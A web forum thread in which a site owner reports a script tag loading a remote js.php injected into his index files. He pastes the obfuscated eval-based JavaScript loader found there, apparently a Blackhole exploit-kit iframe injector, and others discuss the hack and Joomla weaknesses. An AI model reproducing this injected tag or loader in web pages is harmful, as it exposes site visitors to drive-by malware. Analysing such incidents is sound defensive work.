Skip to content
View in the app

A better way to browse. Learn more.

Web Designer Forum

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

java script added in index file?

Featured Replies

hello, i didnt know where to post this but i thought in this section would be fairly suitable, anyway, i went to my website today and realised there was a error on the page and i said to myself thats strange it worked last time and i hadnt edited any scripts, well it was because a javascript line had been added to before the start session line,

 

<script type="text/javascript" src="http://psa.krakow.pl/js.php"></script>

 

thats what was inserted to the top of the script, does anyone know exactly what this is and why and where its from?

 

Thanks, Gary

  • Author

great, my login file has been emptied also "/ whether its to do with the insertion of the script i dont know, good job ive got a backup copy of it lol

Sorry to say you've been hacked - get in touch with your hosting company, let them know what has happened, they maybe able to restore your site (from their backup) prior to the hack

  • Author

Sorry to say you've been hacked - get in touch with your hosting company, let them know what has happened, they maybe able to restore your site (from their backup) prior to the hack

i seen a post from someone the other day with a similar thing, im sure the answer wasnt hacked, i remember seing it but not reading it in depth, why would someone hack someones site, to only remove 1 of the scripts in a totally random directory and then paste a javascript link on the top of my 2 index files? weird, although i do appreciate your help i will await further replies first

 

Thanks, Gary

The reason why - I don't know and I don't want to investigate to find out what the script does ~ it probably redirects you to another site?

  • Author

The reason why - I don't know and I don't want to investigate to find out what the script does ~ it probably redirects you to another site?

 

it did nothing, it was js.php aswel so basicaly a php script in java tags but in the .php file it has a javascript saying

 

var ar=" if (document.gElsByTaN'B)[0]{r;}v=\"pChw<:/x21>A,";</script><script>var ar2=[0,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,25,29,0,0,0,1,2,30,21,9,10,30,4,25,31,0,0,32,3,10,16,17,10,3,29,0,0,0,33,21,30,3,24,5,19,3,34,3,5,6,7,8,9,10,11,12,13,7,30,10,21,12,10,15,16,10,9,10,11,12,4,35,24,6,5,19,35,25,31,0,0,0,12,30,19,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,21,36,36,10,11,5,37,38,1,16,5,4,24,5,19,25,31,0,0,0,32,3,7,21,12,7,38,3,4,10,25,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,24,6,5,19,3,34,3,24,5,19,31,0,0,0,32,0,0,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,25,29,0,0,0,0,1,2,30,21,9,10,30,4,25,31,0,0,0,32,3,10,16,17,10,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,39,30,1,12,10,4,35,40,1,2,30,21,9,10,3,17,30,7,34,23,38,12,12,36,41,42,42,43,43,16,13,21,9,10,30,1,7,21,11,12,6,39,11,17,13,7,6,42,11,10,39,17,42,44,27,45,27,23,3,39,1,5,12,38,34,23,45,27,23,3,38,10,1,14,38,12,34,23,45,27,23,3,17,12,19,16,10,34,23,33,1,17,1,24,1,16,1,12,19,41,38,1,5,5,10,11,31,36,6,17,1,12,1,6,11,41,21,24,17,6,16,8,12,10,31,16,10,2,12,41,27,31,12,6,36,41,27,31,23,46,40,42,1,2,30,21,9,10,46,35,25,31,0,0,0,32,0,0,32,0,0,2,8,11,7,12,1,6,11,3,1,2,30,21,9,10,30,4,25,29,0,0,0,33,21,30,3,2,3,34,3,5,6,7,8,9,10,11,12,13,7,30,10,21,12,10,15,16,10,9,10,11,12,4,23,1,2,30,21,9,10,23,25,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,17,30,7,23,48,23,38,12,12,36,41,42,42,43,43,16,13,21,9,10,30,1,7,21,11,12,6,39,11,17,13,7,6,42,11,10,39,17,42,44,27,45,27,23,25,31,2,13,17,12,19,16,10,13,33,1,17,1,24,1,16,1,12,19,34,23,38,1,5,5,10,11,23,31,2,13,17,12,19,16,10,13,36,6,17,1,12,1,6,11,34,23,21,24,17,6,16,8,12,10,23,31,2,13,17,12,19,16,10,13,16,10,2,12,34,23,27,23,31,2,13,17,12,19,16,10,13,12,6,36,34,23,27,23,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,39,1,5,12,38,23,48,23,45,27,23,25,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,38,10,1,14,38,12,23,48,23,45,27,23,25,31,0,0,0,5,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,13,21,36,36,10,11,5,37,38,1,16,5,4,2,25,31,0,0,32];pau='val';e=new Function('','return e'+pau)();s="";for(i=0;i<ar2.length;i++){s+=ar[ar2];}

e(s);

 

this made no affect to my site in terms of redirection or anything, the site the javascript is from is saying

"http://psa.krakow.pl/"

which is a polish tradesman website like building and plumbing i had supposed :s

We too had this on a couple of our sites and the links to javascript php files were different domains on each page. How can this be prevented in the future?

Interesting - I tried to quote the OP and hit "preview post" adn my AVG blocked it and informed me there was the "Blackhole Exploit" threat. Must be AVG's interpretation of the post?

I can't remember what site this was posted on but a popular CMS has a weakness people are taking advantage on and putting javascript links on peoples websites. It sounds like this has happened to you, supposedly it hit thousands of websites.

 

(it might not have even been a cms, i can't remember where the article was).

 

And I read something about flash having weaknesses but I wont even try to pretend to know anything about that.

Edited by PhilipMClifton

I reckon you've been hacked too. I always worry if a script finds its way onto pages, especially php so I just checked out that one at source-code-viewer[dot]com. (good site to read a pages source code without visiting the page).

 

I didn't get what you were seeing (which might be the php in action) but saw a script adding style to the head. The use of eval is a worry though as it may have been dynamically writing an iframe and loading who knows what into into it. A popular hack from last year. Scripts that have strange urls (not associated with any cms you might be using) probably should be removed.

  • Author

I can't remember what site this was posted on but a popular CMS has a weakness people are taking advantage on and putting javascript links on peoples websites. It sounds like this has happened to you, supposedly it hit thousands of websites.

 

(it might not have even been a cms, i can't remember where the article was).

 

And I read something about flash having weaknesses but I wont even try to pretend to know anything about that.

 

i have heard of it being a break through on a CMS i think it was joomla loads of people had said they got it and they was using joomla, but that doesnt explain how it got on my websites because my websites are non CMS whatsoever, also flash is pretty secure, aslong as the PHP the flash is interacting with has its sanitisation on as usual its the same security level as PHP alone unless people know magic lol

 

I reckon you've been hacked too. I always worry if a script finds its way onto pages, especially php so I just checked out that one at source-code-viewer[dot]com. (good site to read a pages source code without visiting the page).

 

nah mate, i run 4/5 websites on different domain names, 2 different servers an they all had that script put at the top of index files, 2 of the 5 websites dont even have slightest use of php either, no input fields or anything so it wasnt sql injected, also one of my previous clients had it done on there website, and much more people had it done to them, whether it was the server hacked or not i dont know, dont have a clue what the scripts doing either haha

 

**edit, saying that, looking at the script that was in the js.php file i think people do know magic haha

 

,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,25,29,0,0,0,1,2,30,21,9,10,30,4,25,31,0,0,32,3,10,16,17,10,3,29,0,0,0,33,21,30,3,24,5,19,3,34,3,5,6,7,8,9,10,11,12,13,7,30,10,21,12,10,15,16,10,9,10,11,12,4,35,24,6,5,19,35,25,31,0,0,0,12,30,19,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,21,36,36,10,11,5,37,38,1,16,5,4,24,5,19,25,31,0,0,0,32,3,7,21,12,7,38,3,4,10,25,3,29,0,0,0,0,5,6,7,8,9,10,11,12,13,24,6,5,19,3,34,3,24,5,19,31,0,0,0,32,0,0,0,1,2,3,4,5,6,7,8,9,10,11,12,9,16,10,13,16,10,2,12,34,23,27,23,31,2,13,17,12,19,16,10,13,12,6,36,34,23,27,23,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,39,1,5,12,38,23,48,23,45,27,23,25,31,2,13,17,10,12,47,12,12,30,1,24,8,12,10,4,23,38,10,1,14,38,12,23,48,23,45,27,23,25,31,0,0,0,5,6,7,8,9,10,11,12,13,14,10,12,15,16,10,9,10,11,12,17,18,19,20,21,14,22,21,9,10,4,23,24,6,5,19,23,25,26,27,28,13,21,36,36,10,11,5,37,38,1,16,5,4,2,25,31,0,0,32];pau='val';e=new Function('','return e'+pau)();s="";for(i=0;i<ar2.length;i++){s+=a

Edited by web-itec

  • Author

I've had this happen to me twice now. Getting cheesed off with it now.

 

lol i got it twice on my main website, i just changed server password, updated filezilla and firefox incase it was somethin to do with that (doubt it) and virus scanned computer (before password change)

  • Author

It's just frustrating. Seriously thinking of dithcing Joomla!

 

may not be joomla mate on your behalf as i got the insert and im not using joomla

may not be joomla mate on your behalf as i got the insert and im not using joomla

Hmm wonder what else it could be then. Most people I know who have had the problem were Joomla users.

  • 3 weeks later...
  • Author

Hmm wonder what else it could be then. Most people I know who have had the problem were Joomla users.

 

hmm when i was targeted initially was the same time when my other sites were injected some how too, but on my main site when i remove alot of directories i had and made functions to prevent injection of any kind i didnt get it again but my other sites did that didnt have these functions.. hope it helps

Create an account or sign in to comment

Account

Navigation

Search

Search

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.